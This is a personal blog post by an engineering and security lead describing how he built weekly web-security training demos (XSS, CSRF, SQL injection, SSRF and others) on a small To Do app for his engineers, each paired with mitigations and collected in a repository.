Security Demos

As someone who has been handling both engineering and information security programs for years now, I find myself obliged to provide information security training to my engineers. I believe a builder's mindset is very different from a breaker's mindset. But I observed that when you show good builders how their code can be broken, they become extremely cautious, and not only do they try to protect their own codebases, but they also help others protect theirs.

As the engineering org was growing rapidly at slice, I saw that the engineers were making the exact same mistakes repeatedly in the codebase and were overlooking security validations most of the time. While we had a very high bar for engineering talent, I realised that the problem was not related to skill or intention; the problem was a knowledge gap. A knowledge gap can be filled by providing training. So I came up with an idea of creating a virtual team: every pod would nominate one engineer who would get trained on information security and be responsible for all the security activities in their respective team.

I thought that the textbook way of teaching about information security would be just throwing jargon. So I started creating small demos. I created a small To Do List application in the MEAN stack, and every week I would try to break the application in different ways and, at the same time, propose mechanisms to safeguard the app. The first demo was about adding an XSS script in the To Do list and allowing a script hosted on another domain to run on the app. When I showed it to the virtual team, they started asking more questions around the "What happens when XYZ?" template. I realised that I had their attention on security. That gave me the motivation to create even more demos. In the coming week, I created demos about conducting CSRF attacks, types of CSRF attacks, and how to mitigate the same. Later, I got requests from a few engineers who wanted to join the virtual security team because their friends told them about the demos. I kept adding more demos about SQL injections, malicious file uploads, RegEx DOS, etc., as the team size increased. At one point, I decided to convert this repo into a training module and provide the training to the entire team.

Even today, I conduct these sessions for my engineering teams and I get asked very interesting questions from the team members.

Only this time, I asked Google Antigravity to add a few more demos to it using Gemini Flash 3, and it did an amazing job. You can find the complete set of demos in the security-demos repository.

• 00. Unsecured App
• 01. XSS
• 02. CSRF
• 03. SQL Injection
• 04. Malicious File Upload
• 05. RegEx DOS
• 06. Command Line Injection
• 07. IDOR
• 08. SSRF
• 09. CORS
• 10. Clickjacking
• 11. Directory Traversal

The repo is quite self-explanatory. Each folder in the repo contains an unsecured application, an attack vector, and a secure application. Also, each folder has a README.md file that clearly manifests the objective of the attack, prerequisites, steps to set up the environment for conducting the attack, steps to conduct the demo, and ways to mitigate the attack.

I hope you find this useful and are able to learn about different types of attacks and how to mitigate the same.